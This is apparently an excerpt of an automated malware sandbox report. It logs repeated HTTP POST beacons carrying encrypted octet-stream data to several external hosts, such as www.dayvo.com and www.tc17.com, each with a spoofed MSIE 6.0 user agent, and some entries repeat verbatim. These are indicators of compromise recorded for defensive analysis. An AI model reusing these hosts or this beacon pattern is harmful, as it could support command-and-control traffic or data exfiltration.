4c 66 49 34 2f 52 6d 78 4b 79 52 4d 4b 6b 4c 38 4c 69 6f 77 4d 50 4a 4a 4b 44 59 42 4b 64 59 64 2b 70 74 53 6d 76 70 50 58 58 61 79 31 79 6b 66 52 6b 72 77 74 53 63 58 61 33 68 51 4d 33 37 6a 74 35 4f 66 75 6d 72 48 74 4d 4c 36 4a 57 2f 77 75 64 53 58 61 4b 4f 71 2b 4f 43 39 63 43 41 4d 4a 66 47 77 73 32 4d 6b 6c 31 65 63 78 52 35 43 73 6c 45 42 58 54 39 44 51 73 79 6f 57 78 48 77 75 7a 79 41 4d 35 64 44 4f 46 6b 30 63 63 75 6b 56 68 34 30 61 56 71 4f 64 78 68 52 30 50 34 53 61 6b 55 67 42 38 55 6c 2b 7a 41 6d 4f 4d 76 6f 32 4b 79 6f 62 6a 46 73 52 51 72 66 74 62 69 72 39 6f 41 47 71 74 35 6c 63 6a 2f 51 58 76 6d 6b 44 70 58 61 77 5a 30 6b 67 37 2f 78 6b 76 37 4a 51 35 35 37 58 76 4e 67 50 6d 74 77 71 36 5a 70 6e 66 57 47 75 34 30 31 45 38 3d Data Ascii: hJdICfTBUGkEHsgUTwSks0fhsyzsCfVfaP4OccU5bjdQxlcDY/8M8jhtnQYwUkArQtIUOtQWTAIqF4TOtsxC+L7iNAKOSVBSaOl11c3PA/G1Sw/zzgRsqNdlv30SSkicqgpt3ZBLUg8M+B1xbjbLLt2s6OsE+RaRllPSao/0p84uxuv2I9nTd+RQdudjEPqZznEoRXyVBgYNMRviDNx0NK+VCJ8Oaus4s+h37V/NZw75DfWTDMz5NVNwRjFiNonTTR3cxXiqOLE7l4EoyO79UUrU3vCOrqLRUcWBm/8qYBJKhT/eMoDBkNcfcx4+NpmE/tFlkYjGftbJXvOWYLfI4/RmxKyRMKkL8LiowMPJJKDYBKdYd+ptSmvpPXXay1ykfRkrwtScXa3hQM37jt5OfumrHtML6JW/wudSXaKOq+OC9cCAMJfGws2Mkl1ecxR5CslEBXT9DQsyoWxHwuzyAM5dDOFk0ccukVh40aVqOdxhR0P4SakUgB8Ul+zAmOMvo2KyobjFsRQrftbir9oAGqt5lcj/QXvmkDpXawZ0kg7/xkv7JQ557XvNgPmtwq6ZpnfWGu401E8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.spanesi.comCache-Control: no-cacheData Raw: 52 53 75 42 63 49 2b 38 5a 47 6b 4a 4f 6f 6f 63 4c 6f 43 6b 49 35 67 46 33 43 59 6c 4a 4a 4f 65 4d 34 33 45 61 51 53 4f 66 37 69 71 38 59 30 4e 64 75 72 30 59 51 31 34 34 79 5a 7a 45 56 56 59 6f 66 33 6c 7a 71 5a 68 36 4b 4f 51 43 42 56 6e 48 34 62 74 61 31 39 6e 53 31 61 64 45 6d 79 4f 56 4a 61 45 6b 76 50 2f 44 34 4e 70 71 2f 52 38 45 36 36 62 55 4f 36 64 55 6b 41 55 49 71 2f 77 51 70 49 57 34 45 6c 51 77 31 56 2f 48 62 2f 39 74 7a 5a 6a 4c 55 73 71 45 41 72 79 41 66 4c 4c 62 39 32 69 74 6b 33 58 75 70 57 39 36 6c 6b 71 31 61 6a 67 7a 49 73 71 61 43 2b 59 47 48 54 76 79 45 6a 52 36 55 4e 54 36 38 6a 66 69 32 75 2b 4c 72 6d 34 52 63 70 57 52 72 4f 66 5a 79 30 71 72 63 6a 67 39 53 50 2b 36 79 79 70 67 47 46 6c 74 73 5a 47 4d 56 59 78 57 50 45 6b 70 44 52 6f 72 6d 34 6c 66 69 71 37 65 6c 32 4d 4b 47 4a 63 6b 61 76 43 31 44 31 6e 7a 52 44 70 38 51 4a 55 47 35 75 67 73 6d 71 5a 69 6d 44 43 6a 57 2f 4f 44 65 43 42 4b 37 6e 63 77 32 4e 63 68 37 36 79 41 55 68 4e 39 51 35 6e 56 50 44 73 42 76 5a 35 4e 45 33 72 52 39 52 64 6d 69 66 79 61 64 7a 61 6c 35 51 4a 51 4e 36 4f 43 37 61 37 57 72 68 53 6b 47 56 69 79 48 52 7a 75 4c 56 36 33 70 45 50 6a 74 6d 77 49 2b 79 44 55 70 46 39 38 51 41 56 4a 32 71 65 32 56 69 6a 51 68 31 73 66 75 38 41 35 70 72 70 56 4e 74 34 68 70 4b 49 65 53 53 30 76 4b 7a 64 33 79 4e 72 44 6d 65 70 66 6c 71 2b 69 32 32 59 50 65 79 4d 56 34 49 39 48 2b 5a 63 6e 75 63 7a 52 6f 47 62 63 70 50 36 7a 53 51 6a 52 31 66 47 64 49 32 38 31 64 66 57 72 4b 4d 59 62 63 59 34 6f 79 79 6d 47 64 32 73 70 52 48 30 6c 64 70 46 4f 6f 75 63 37 65 6b 59 53 61 4a 37 44 69 31 58 42 75 62 75 77 34 43 2f 74 31 2b 59 70 38 67 3d Data Ascii: RSuBcI+8ZGkJOoocLoCkI5gF3CYlJJOeM43EaQSOf7iq8Y0Ndur0YQ144yZzEVVYof3lzqZh6KOQCBVnH4bta19nS1adEmyOVJaEkvP/D4Npq/R8E66bUO6dUkAUIq/wQpIW4ElQw1V/Hb/9tzZjLUsqEAryAfLLb92itk3XupW96lkq1ajgzIsqaC+YGHTvyEjR6UNT68jfi2u+Lrm4RcpWRrOfZy0qrcjg9SP+6yypgGFltsZGMVYxWPEkpDRorm4lfiq7el2MKGJckavC1D1nzRDp8QJUG5ugsmqZimDCjW/ODeCBK7ncw2Nch76yAUhN9Q5nVPDsBvZ5NE3rR9Rdmifyadzal5QJQN6OC7a7WrhSkGViyHRzuLV63pEPjtmwI+yDUpF98QAVJ2qe2VijQh1sfu8A5prpVNt4hpKIeSS0vKzd3yNrDmepflq+i22YPeyMV4I9H+ZcnuczRoGbcpP6zSQjR1fGdI281dfWrKMYbcY4oyymGd2spRH0ldpFOouc7ekYSaJ7Di1XBubuw4C/t1+Yp8g=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 45 47 45 52 50 35 41 68 59 32 6c 38 78 39 70 6b 49 77 66 6e 58 45 4d 54 55 63 47 34 64 39 38 4a 78 4f 46 34 76 4c 59 45 71 33 30 49 30 70 2f 31 6d 76 66 41 37 4e 48 4a 72 69 61 46 4c 72 35 2b 7a 79 4d 53 35 46 72 78 76 6c 6a 4c 6c 73 31 2b 46 51 52 63 59 36 56 56 4b 57 77 4b 52 2f 47 49 6f 71 62 64 63 72 4d 68 46 6f 47 38 63 4e 79 2f 6c 58 75 4e 46 61 46 30 32 6a 7a 65 56 45 6e 2b 68 4e 4e 70 38 6f 6d 64 54 7a 2f 32 48 7a 6e 30 47 44 53 74 35 55 36 53 7a 64 6e 4e 36 6f 49 62 50 48 62 4f 5a 4f 4d 79 70 72 66 5a 54 63 58 4f 69 34 42 46 30 68 2f 30 71 30 53 4c 31 36 4b 61 72 66 5a 37 4b 36 47 44 47 72 76 43 69 6f 72 45 6e 58 77 73 43 6b 63 4b 59 50 47 34 53 72 61 66 55 32 39 6d 6c 6f 38 46 36 37 35 64 51 41 30 58 44 67 52 38 75 4a 57 66 6b 58 52 36 4a 74 4c 51 6d 66 64 45 34 4d 44 61 57 4a 74 56 4c 4b 42 47 75 62 74 4c 55 42 6a 63 43 6e 47 66 66 53 41 55 71 69 59 4e 6d 71 48 57 68 4a 56 76 4e 33 6c 65 35 66 38 71 50 43 2f 69 42 4e 75 45 65 38 31 41 50 30 43 39 34 2b 64 34 46 55 52 6d 39 70 69 63 72 54 43 4a 2f 61 36 31 57 72 6d 30 57 79 72 6b 69 55 42 41 4b 62 61 6a 44 52 30 63 43 7a 62 30 39 56 6b 6a 55 30 64 66 4d 39 6f 61 76 63 50 6c 55 54 55 55 6b 38 47 45 77 63 67 43 72 62 63 71 65 6a 77 53 50 6a 32 63 62 32 79 73 37 32 63 57 76 37 71 34 49 72 44 4d 4c 49 77 39 76 6c 70 34 45 62 53 6b 58 33 61 7a 4a 34 76 62 37 4f 63 7a 4f 6e 6c 38 76 49 4b 4a 6c 54 33 69 62 6a 4f 61 46 57 37 7a 4f 47 6b 31 58 67 65 38 55 73 39 37 61 38 33 43 73 6c 52 44 6a 77 76 66 78 68 6d 6f 75 57 69 4f 41 52 5a 54 33 59 68 6d 74 69 66 5a 66 39 48 63 64 66 33 61 64 62 6d 62 77 69 7a 52 66 52 53 73 46 7a 79 4a 32 37 6a 50 31 34 30 36 55 43 69 76 71 74 45 7a 55 51 36 58 49 57 37 34 46 6d 68 66 4d 67 48 51 59 79 4e 34 48 54 32 48 70 41 3d 3d Data Ascii: EGERP5AhY2l8x9pkIwfnXEMTUcG4d98JxOF4vLYEq30I0p/1mvfA7NHJriaFLr5+zyMS5FrxvljLls1+FQRcY6VVKWwKR/GIoqbdcrMhFoG8cNy/lXuNFaF02jzeVEn+hNNp8omdTz/2Hzn0GDSt5U6SzdnN6oIbPHbOZOMyprfZTcXOi4BF0h/0q0SL16KarfZ7K6GDGrvCiorEnXwsCkcKYPG4SrafU29mlo8F675dQA0XDgR8uJWfkXR6JtLQmfdE4MDaWJtVLKBGubtLUBjcCnGffSAUqiYNmqHWhJVvN3le5f8qPC/iBNuEe81AP0C94+d4FURm9picrTCJ/a61Wrm0WyrkiUBAKbajDR0cCzb09VkjU0dfM9oavcPlUTUUk8GEwcgCrbcqejwSPj2cb2ys72cWv7q4IrDMLIw9vlp4EbSkX3azJ4vb7OczOnl8vIKJlT3ibjOaFW7zOGk1Xge8Us97a83CslRDjwvfxhmouWiOARZT3YhmtifZf9Hcdf3adbmbwizRfRSsFzyJ27jP1406UCivqtEzUQ6XIW74FmhfMgHQYyN4HT2HpA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 51 42 6a 41 45 6c 38 42 61 6d 6b 42 71 2f 34 39 76 74 2b 6a 39 65 67 32 6b 63 77 31 45 61 53 6c 41 33 63 6e 42 43 43 71 46 47 7a 77 39 63 63 63 64 68 71 6d 33 49 6e 55 39 48 71 76 32 68 57 57 46 62 4e 59 6f 55 77 6f 74 55 55 68 71 63 45 31 56 49 53 58 4e 6b 4e 74 64 4a 46 7a 39 68 63 4b 6e 77 73 54 71 4c 50 58 50 56 54 4e 31 7a 74 31 2f 55 38 41 53 55 43 31 43 54 68 59 63 72 4d 5a 50 74 6b 47 55 76 4f 61 68 5a 35 65 62 67 70 69 34 6d 65 41 51 46 57 4c 38 7a 49 4c 70 70 78 64 56 77 67 49 49 6d 4e 44 74 38 6f 76 34 68 4c 4a 66 49 64 6d 59 2f 7a 2f 45 73 35 77 2b 6a 4b 74 73 74 38 63 65 46 43 37 4d 49 68 6d 65 30 30 52 62 57 49 47 73 34 4b 47 57 71 43 70 44 69 32 49 43 55 63 6d 47 4f 43 4c 45 61 44 2f 36 56 58 62 68 79 69 6d 4c 4f 4b 5a 55 34 43 64 6c 66 4e 49 4f 30 44 47 30 38 34 75 6d 56 71 70 46 53 41 6c 63 58 4a 42 74 49 38 75 45 56 6d 42 43 72 39 77 58 44 48 37 68 36 45 62 4f 2b 47 45 48 36 4d 47 77 44 63 57 4c 38 6a 46 4c 6e 6e 38 78 37 30 63 5a 37 6b 44 47 2f 67 46 65 6c 6c 74 46 7a 4c 42 71 30 73 63 37 68 69 76 44 49 59 77 2f 31 47 38 69 79 6b 70 65 69 4d 2b 6b 77 43 54 4c 54 64 56 50 38 76 57 79 54 43 64 37 4c 5a 4b 77 67 4e 65 47 50 70 6d 6e 6e 48 79 51 51 77 74 67 66 4a 45 78 6b 43 5a 74 4d 67 47 79 6c 4d 31 51 70 63 47 6c 68 70 58 48 42 65 2b 31 72 33 47 69 48 37 4e 71 48 69 6a 48 52 36 71 42 6c 71 75 42 4f 78 6d 72 44 42 6a 31 41 6a 62 67 2b 7a 43 4f 6b 63 6d 39 34 37 32 56 43 41 70 6a 4d 61 76 4e 6a 71 38 51 6f 63 43 37 65 49 72 52 75 69 4e 49 6a 6f 57 4b 75 6e 51 66 6e 38 5a 38 64 58 67 77 4d 33 64 48 74 58 6c 54 71 71 4e 2f 55 4d 75 6f 43 55 34 47 74 67 33 Data Ascii: QBjAEl8BamkBq/49vt+j9eg2kcw1EaSlA3cnBCCqFGzw9cccdhqm3InU9Hqv2hWWFbNYoUwotUUhqcE1VISXNkNtdJFz9hcKnwsTqLPXPVTN1zt1/U8ASUC1CThYcrMZPtkGUvOahZ5ebgpi4meAQFWL8zILppxdVwgIImNDt8ov4hLJfIdmY/z/Es5w+jKtst8ceFC7MIhme00RbWIGs4KGWqCpDi2ICUcmGOCLEaD/6VXbhyimLOKZU4CdlfNIO0DG084umVqpFSAlcXJBtI8uEVmBCr9wXDH7h6EbO+GEH6MGwDcWL8jFLnn8x70cZ7kDG/gFelltFzLBq0sc7hivDIYw/1G8iykpeiM+kwCTLTdVP8vWyTCd7LZKwgNeGPpmnnHyQQwtgfJExkCZtMgGylM1QpcGlhpXHBe+1r3GiH7NqHijHR6qBlquBOxmrDBj1Ajbg+zCOkcm9472VCApjMavNjq8QocC7eIrRuiNIjoWKunQfn8Z8dXgwM3dHtXlTqqN/UMuoCU4Gtg3
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 75 56 2b 79 51 57 6f 33 59 32 6c 7a 6d 6d 76 6a 54 66 2f 6d 68 79 33 55 36 53 61 61 4d 2f 42 4c 50 76 68 47 7a 6c 36 48 50 4c 6c 33 61 54 52 58 49 46 35 7a 32 48 70 52 6c 4b 7a 30 68 74 37 55 52 43 57 4e 69 36 33 32 52 4e 78 71 6c 58 70 36 70 63 78 69 64 71 50 31 34 73 39 65 5a 77 77 38 41 43 54 56 56 4b 69 46 4b 44 36 37 57 46 59 2f 61 7a 55 6b 46 65 33 52 4f 2f 7a 56 4d 2f 70 4c 50 42 74 78 65 76 47 49 59 2f 53 33 4a 41 58 49 33 6d 2f 32 44 47 65 48 4b 77 48 62 6f 5a 54 45 35 61 61 2f 67 41 4d 44 6c 7a 2b 6d 6f 6e 76 7a 62 6f 37 2b 2f 4c 58 58 5a 42 43 65 31 4e 4e 59 4b 53 64 47 52 54 61 2f 51 57 2b 70 64 44 6f 59 36 7a 2b 39 75 74 78 7a 53 33 57 43 68 4f 74 7a 42 51 72 41 33 71 61 42 53 33 6d 78 63 74 59 73 73 56 33 49 5a 66 35 6c 52 75 50 2b 72 36 72 77 68 34 2f 77 5a 55 54 63 49 6e 7a 76 4c 36 65 76 63 41 38 6c 43 56 46 41 35 6b 56 45 30 31 4b 2f 71 6e 65 66 61 33 37 39 39 47 7a 68 68 49 6f 64 4e 44 55 6a 56 65 75 43 43 4d 36 57 72 2b 76 72 55 4a 5a 41 30 70 30 45 4d 7a 4c 44 6c 31 4d 68 33 68 52 47 33 45 4e 41 35 5a 33 61 54 62 68 35 4e 42 6f 73 65 4a 4d 6c 61 51 47 66 64 6a 4f 47 32 75 43 55 35 6c 2f 79 75 63 74 50 4b 49 63 73 65 57 5a 75 62 5a 78 38 4a 62 72 65 66 47 67 34 69 6d 52 50 66 2f 4f 74 72 69 33 6d 70 56 73 56 6e 4d 4a 2b 47 47 34 72 45 33 37 36 76 37 66 6b 30 4d 32 2f 6e 30 38 33 59 4f 5a 76 51 77 6c 35 69 52 48 6c 35 76 73 4d 41 46 76 67 64 52 54 4f 76 66 56 6f 71 71 64 59 43 48 6d 38 57 78 61 41 57 69 47 57 42 76 61 39 73 4a 6f 5a 48 34 39 76 61 36 75 6a 4c 4b 39 77 4e 31 51 58 2f 4e 79 4f 46 36 2b 35 74 50 4c 4b 6a 33 5a 73 76 47 58 59 71 31 63 46 6b 7a 58 69 4e 55 76 6e 43 2f 37 61 6b 58 4a 78 68 6b 72 2b 56 43 6a 30 4c 6f 4e 75 2f 6d 34 3d Data Ascii: uV+yQWo3Y2lzmmvjTf/mhy3U6SaaM/BLPvhGzl6HPLl3aTRXIF5z2HpRlKz0ht7URCWNi632RNxqlXp6pcxidqP14s9eZww8ACTVVKiFKD67WFY/azUkFe3RO/zVM/pLPBtxevGIY/S3JAXI3m/2DGeHKwHboZTE5aa/gAMDlz+monvzbo7+/LXXZBCe1NNYKSdGRTa/QW+pdDoY6z+9utxzS3WChOtzBQrA3qaBS3mxctYssV3IZf5lRuP+r6rwh4/wZUTcInzvL6evcA8lCVFA5kVE01K/qnefa3799GzhhIodNDUjVeuCCM6Wr+vrUJZA0p0EMzLDl1Mh3hRG3ENA5Z3aTbh5NBoseJMlaQGfdjOG2uCU5l/yuctPKIcseWZubZx8JbrefGg4imRPf/Otri3mpVsVnMJ+GG4rE376v7fk0M2/n083YOZvQwl5iRHl5vsMAFvgdRTOvfVoqqdYCHm8WxaAWiGWBva9sJoZH49va6ujLK9wN1QX/NyOF6+5tPLKj3ZsvGXYq1cFkzXiNUvnC/7akXJxhkr+VCj0LoNu/m4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 51 42 6a 41 45 6c 38 42 61 6d 6b 42 71 2f 34 39 76 74 2b 6a 39 65 67 32 6b 63 77 31 45 61 53 6c 41 33 63 6e 42 43 43 71 46 47 7a 77 39 63 63 63 64 68 71 6d 33 49 6e 55 39 48 71 76 32 68 57 57 46 62 4e 59 6f 55 77 6f 74 55 55 68 71 63 45 31 56 49 53 58 4e 6b 4e 74 64 4a 46 7a 39 68 63 4b 6e 77 73 54 71 4c 50 58 50 56 54 4e 31 7a 74 31 2f 55 38 41 53 55 43 31 43 54 68 59 63 72 4d 5a 50 74 6b 47 55 76 4f 61 68 5a 35 65 62 67 70 69 34 6d 65 41 51 46 57 4c 38 7a 49 4c 70 70 78 64 56 77 67 49 49 6d 4e 44 74 38 6f 76 34 68 4c 4a 66 49 64 6d 59 2f 7a 2f 45 73 35 77 2b 6a 4b 74 73 74 38 63 65 46 43 37 4d 49 68 6d 65 30 30 52 62 57 49 47 73 34 4b 47 57 71 43 70 44 69 32 49 43 55 63 6d 47 4f 43 4c 45 61 44 2f 36 56 58 62 68 79 69 6d 4c 4f 4b 5a 55 34 43 64 6c 66 4e 49 4f 30 44 47 30 38 34 75 6d 56 71 70 46 53 41 6c 63 58 4a 42 74 49 38 75 45 56 6d 42 43 72 39 77 58 44 48 37 68 36 45 62 4f 2b 47 45 48 36 4d 47 77 44 63 57 4c 38 6a 46 4c 6e 6e 38 78 37 30 63 5a 37 6b 44 47 2f 67 46 65 6c 6c 74 46 7a 4c 42 71 30 73 63 37 68 69 76 44 49 59 77 2f 31 47 38 69 79 6b 70 65 69 4d 2b 6b 77 43 54 4c 54 64 56 50 38 76 57 79 54 43 64 37 4c 5a 4b 77 67 4e 65 47 50 70 6d 6e 6e 48 79 51 51 77 74 67 66 4a 45 78 6b 43 5a 74 4d 67 47 79 6c 4d 31 51 70 63 47 6c 68 70 58 48 42 65 2b 31 72 33 47 69 48 37 4e 71 48 69 6a 48 52 36 71 42 6c 71 75 42 4f 78 6d 72 44 42 6a 31 41 6a 62 67 2b 7a 43 4f 6b 63 6d 39 34 37 32 56 43 41 70 6a 4d 61 76 4e 6a 71 38 51 6f 63 43 37 65 49 72 52 75 69 4e 49 6a 6f 57 4b 75 6e 51 66 6e 38 5a 38 64 58 67 77 4d 33 64 48 74 58 6c 54 71 71 4e 2f 55 4d 75 6f 43 55 34 47 74 67 33 Data Ascii: QBjAEl8BamkBq/49vt+j9eg2kcw1EaSlA3cnBCCqFGzw9cccdhqm3InU9Hqv2hWWFbNYoUwotUUhqcE1VISXNkNtdJFz9hcKnwsTqLPXPVTN1zt1/U8ASUC1CThYcrMZPtkGUvOahZ5ebgpi4meAQFWL8zILppxdVwgIImNDt8ov4hLJfIdmY/z/Es5w+jKtst8ceFC7MIhme00RbWIGs4KGWqCpDi2ICUcmGOCLEaD/6VXbhyimLOKZU4CdlfNIO0DG084umVqpFSAlcXJBtI8uEVmBCr9wXDH7h6EbO+GEH6MGwDcWL8jFLnn8x70cZ7kDG/gFelltFzLBq0sc7hivDIYw/1G8iykpeiM+kwCTLTdVP8vWyTCd7LZKwgNeGPpmnnHyQQwtgfJExkCZtMgGylM1QpcGlhpXHBe+1r3GiH7NqHijHR6qBlquBOxmrDBj1Ajbg+zCOkcm9472VCApjMavNjq8QocC7eIrRuiNIjoWKunQfn8Z8dXgwM3dHtXlTqqN/UMuoCU4Gtg3
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 38 42 6a 31 5a 6d 2b 39 62 47 6d 37 48 7a 37 70 6a 73 78 46 61 6e 67 5a 64 56 32 46 35 69 52 54 45 32 7a 32 38 41 63 4e 43 37 4e 47 71 78 56 41 75 6c 34 52 45 52 57 71 36 58 6d 4f 44 4b 78 48 58 43 66 64 79 37 4a 79 49 58 32 4d 2f 66 38 30 42 79 47 74 2b 35 43 35 54 52 6c 64 4d 30 68 6b 4b 4c 48 51 66 64 61 49 77 77 48 6f 46 4a 6c 63 48 53 57 6c 74 43 54 54 79 77 33 37 56 2f 42 55 70 62 79 38 79 41 66 53 44 33 35 54 39 57 43 46 73 48 73 79 55 4e 55 2f 38 62 55 5a 48 49 5a 30 2f 61 4b 55 44 50 74 35 6a 45 30 58 30 2b 2b 4b 33 31 64 65 4b 31 53 6c 6c 74 31 53 47 70 56 4a 76 54 43 57 6e 69 48 67 48 50 55 6b 75 74 79 2b 51 72 4a 75 4c 50 45 35 67 35 67 6b 34 65 75 71 57 61 6d 77 58 54 75 57 47 51 34 74 6d 68 42 6e 70 4d 2f 73 4b 61 68 41 62 2b 66 46 45 56 39 63 44 6b 4c 73 2b 61 66 54 53 63 66 47 43 43 69 6f 34 39 6a 74 76 4c 67 2f 30 68 78 73 52 57 64 77 70 35 62 53 38 6c 78 31 62 37 4d 53 6c 32 61 71 6f 34 62 71 67 4d 79 68 4c 57 37 65 65 35 46 78 74 46 67 65 58 68 49 55 36 59 4c 6a 33 51 45 7a 30 54 4a 30 6e 52 79 63 47 62 32 4a 61 69 39 78 65 66 69 79 2f 70 4e 64 6d 71 52 72 68 48 64 79 42 68 67 4a 68 37 64 75 41 45 7a 4a 6b 45 55 52 6e 43 45 76 32 38 70 2b 4c 6f 77 4f 50 35 51 36 35 34 30 70 44 6d 70 34 35 33 62 4d 59 4b 68 65 45 64 55 7a 79 75 65 75 44 33 48 77 64 50 50 68 79 78 4c 49 42 57 31 4a 48 42 41 2b 74 6d 53 49 33 69 55 65 68 45 35 34 73 34 55 74 6a 46 2b 67 34 42 30 78 4a 47 4a 70 65 75 76 53 4d 42 2b 77 7a 32 4e 32 4c 33 6f 39 50 42 6e 72 6d 43 76 42 66 4a 64 71 64 31 52 49 50 4c 6a 36 69 7a 46 36 41 4e 71 73 33 4d 55 70 4c 63 77 32 47 55 48 34 51 49 57 35 4f 50 59 6a 71 37 38 48 38 74 39 4e 53 41 77 30 2b 36 6d 75 55 4c 54 6a 4e 46 49 5a 31 6a 72 63 70 79 65 37 54 4d 42 65 4b 34 38 53 50 4e 6e 41 4e 42 6d 52 4b 6f 48 62 33 74 47 38 Data Ascii: 8Bj1Zm+9bGm7Hz7pjsxFangZdV2F5iRTE2z28AcNC7NGqxVAul4RERWq6XmODKxHXCfdy7JyIX2M/f80ByGt+5C5TRldM0hkKLHQfdaIwwHoFJlcHSWltCTTyw37V/BUpby8yAfSD35T9WCFsHsyUNU/8bUZHIZ0/aKUDPt5jE0X0++K31deK1Sllt1SGpVJvTCWniHgHPUkuty+QrJuLPE5g5gk4euqWamwXTuWGQ4tmhBnpM/sKahAb+fFEV9cDkLs+afTScfGCCio49jtvLg/0hxsRWdwp5bS8lx1b7MSl2aqo4bqgMyhLW7ee5FxtFgeXhIU6YLj3QEz0TJ0nRycGb2Jai9xefiy/pNdmqRrhHdyBhgJh7duAEzJkEURnCEv28p+LowOP5Q6540pDmp453bMYKheEdUzyueuD3HwdPPhyxLIBW1JHBA+tmSI3iUehE54s4UtjF+g4B0xJGJpeuvSMB+wz2N2L3o9PBnrmCvBfJdqd1RIPLj6izF6ANqs3MUpLcw2GUH4QIW5OPYjq78H8t9NSAw0+6muULTjNFIZ1jrcpye7TMBeK48SPNnANBmRKoHb3tG8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 38 42 6a 31 5a 6d 2b 39 62 47 6d 37 48 7a 37 70 6a 73 78 46 61 6e 67 5a 64 56 32 46 35 69 52 54 45 32 7a 32 38 41 63 4e 43 37 4e 47 71 78 56 41 75 6c 34 52 45 52 57 71 36 58 6d 4f 44 4b 78 48 58 43 66 64 79 37 4a 79 49 58 32 4d 2f 66 38 30 42 79 47 74 2b 35 43 35 54 52 6c 64 4d 30 68 6b 4b 4c 48 51 66 64 61 49 77 77 48 6f 46 4a 6c 63 48 53 57 6c 74 43 54 54 79 77 33 37 56 2f 42 55 70 62 79 38 79 41 66 53 44 33 35 54 39 57 43 46 73 48 73 79 55 4e 55 2f 38 62 55 5a 48 49 5a 30 2f 61 4b 55 44 50 74 35 6a 45 30 58 30 2b 2b 4b 33 31 64 65 4b 31 53 6c 6c 74 31 53 47 70 56 4a 76 54 43 57 6e 69 48 67 48 50 55 6b 75 74 79 2b 51 72 4a 75 4c 50 45 35 67 35 67 6b 34 65 75 71 57 61 6d 77 58 54 75 57 47 51 34 74 6d 68 42 6e 70 4d 2f 73 4b 61 68 41 62 2b 66 46 45 56 39 63 44 6b 4c 73 2b 61 66 54 53 63 66 47 43 43 69 6f 34 39 6a 74 76 4c 67 2f 30 68 78 73 52 57 64 77 70 35 62 53 38 6c 78 31 62 37 4d 53 6c 32 61 71 6f 34 62 71 67 4d 79 68 4c 57 37 65 65 35 46 78 74 46 67 65 58 68 49 55 36 59 4c 6a 33 51 45 7a 30 54 4a 30 6e 52 79 63 47 62 32 4a 61 69 39 78 65 66 69 79 2f 70 4e 64 6d 71 52 72 68 48 64 79 42 68 67 4a 68 37 64 75 41 45 7a 4a 6b 45 55 52 6e 43 45 76 32 38 70 2b 4c 6f 77 4f 50 35 51 36 35 34 30 70 44 6d 70 34 35 33 62 4d 59 4b 68 65 45 64 55 7a 79 75 65 75 44 33 48 77 64 50 50 68 79 78 4c 49 42 57 31 4a 48 42 41 2b 74 6d 53 49 33 69 55 65 68 45 35 34 73 34 55 74 6a 46 2b 67 34 42 30 78 4a 47 4a 70 65 75 76 53 4d 42 2b 77 7a 32 4e 32 4c 33 6f 39 50 42 6e 72 6d 43 76 42 66 4a 64 71 64 31 52 49 50 4c 6a 36 69 7a 46 36 41 4e 71 73 33 4d 55 70 4c 63 77 32 47 55 48 34 51 49 57 35 4f 50 59 6a 71 37 38 48 38 74 39 4e 53 41 77 30 2b 36 6d 75 55 4c 54 6a 4e 46 49 5a 31 6a 72 63 70 79 65 37 54 4d 42 65 4b 34 38 53 50 4e 6e 41 4e 42 6d 52 4b 6f 48 62 33 74 47 38 Data Ascii: 8Bj1Zm+9bGm7Hz7pjsxFangZdV2F5iRTE2z28AcNC7NGqxVAul4RERWq6XmODKxHXCfdy7JyIX2M/f80ByGt+5C5TRldM0hkKLHQfdaIwwHoFJlcHSWltCTTyw37V/BUpby8yAfSD35T9WCFsHsyUNU/8bUZHIZ0/aKUDPt5jE0X0++K31deK1Sllt1SGpVJvTCWniHgHPUkuty+QrJuLPE5g5gk4euqWamwXTuWGQ4tmhBnpM/sKahAb+fFEV9cDkLs+afTScfGCCio49jtvLg/0hxsRWdwp5bS8lx1b7MSl2aqo4bqgMyhLW7ee5FxtFgeXhIU6YLj3QEz0TJ0nRycGb2Jai9xefiy/pNdmqRrhHdyBhgJh7duAEzJkEURnCEv28p+LowOP5Q6540pDmp453bMYKheEdUzyueuD3HwdPPhyxLIBW1JHBA+tmSI3iUehE54s4UtjF+g4B0xJGJpeuvSMB+wz2N2L3o9PBnrmCvBfJdqd1RIPLj6izF6ANqs3MUpLcw2GUH4QIW5OPYjq78H8t9NSAw0+6muULTjNFIZ1jrcpye7TMBeK48SPNnANBmRKoHb3tG8
